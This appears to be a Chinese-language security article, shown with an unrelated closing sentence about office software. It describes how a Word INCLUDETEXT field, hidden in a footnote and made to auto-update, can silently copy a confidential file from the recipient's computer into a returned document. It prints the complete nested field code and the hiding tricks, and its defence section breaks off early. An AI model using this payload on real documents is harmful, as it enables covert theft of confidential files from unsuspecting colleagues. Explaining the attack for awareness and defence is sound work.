[摘要]一、无声的攻击 下属B给领导A发了一个Word文档,按照正常的办公流程,领导A应该在修订、签署文档后把它发回给下属B。领导A先给Word文档杀毒,确认文档安全之后才打开它。但是,当最后领导A把已...
一、无声的攻击 下属B给领导A发了一个Word文档,按照正常的办公流程,领导A应该在修订、签署文档后把它发回给下属B。领导A先给Word文档杀毒,确认文档安全之后才打开它。但是,当最后领导A把已签字的文档发回给下属B时,这个Word文档却顺手牵羊,偷走了领导A电脑上的一份机密文档c:a.txt。 那么,下属B是怎样完成这次窃密的呢?原来,下属B在文档中插入了一个INCLUDETEXT域。这个域插入到了文档最后一页的脚注之中,域的完整代码是:{ IF { INCLUDETEXT { IF { DATE } = { DATE } "c:\a.txt" "c:\a.txt" } * MERGEFORMAT } = "" "" * MERGEFORMAT }。其中INCLUDETEXT域的作用就是把指定的文件嵌入到当前文档,但它不是宏,所以不会引起Word的安全警告。 用INCLUDETEXT域实施攻击时,有两个关键的问题需要解决:第一,必须隐藏INCLUDETEXT域,避免INCLUDETEXT域被领导A发现;第二,INCLUDETEXT域必须在经过一次更新操作后才会引入目标文件。 首先来看第一个问题。要隐藏INCLUDETEXT域,可以根据Word文档的结构特点,采用多种办法,例如隐藏文字、小而无色的字体等。一种比较通用的办法是,将INCLUDETEXT域嵌入到一个“哑”的IF域。所谓哑的IF域,就是输出结果总是空字符串的IF域。 至于INCLUDETEXT域的更新问题,对于大型的、包含许多正常域的Word文档,这通常不存在问题,因为收到文档的人一般会更新所有的域。但是,下属B采用了一个更好的办法,即在INCLUDETEXT域里面嵌入了一个DATE域,且这个DATE域是文档中的最后一个DATE域,于是整个域就变成了自动更新的域。 下面我们来看看如何避免这种信息泄漏。 二、坚固的防御 显然,这种攻击如果要得逞,攻击者必须知道机密文档的确切名称和路径。但是,对于一起工作的同事来说,攻击成功的可能性大大增加。例如,如果某个人没有访问服务器上共享文件的权限,但知道共享目录和文件的位置、名称,他就可以借助这种攻击,利用另一个人的身份获得共享文件。
Office办公软件是办公的第一选择,这个地球人都知道。除了微软Office,市面上也存在很多其他Office类软件。
……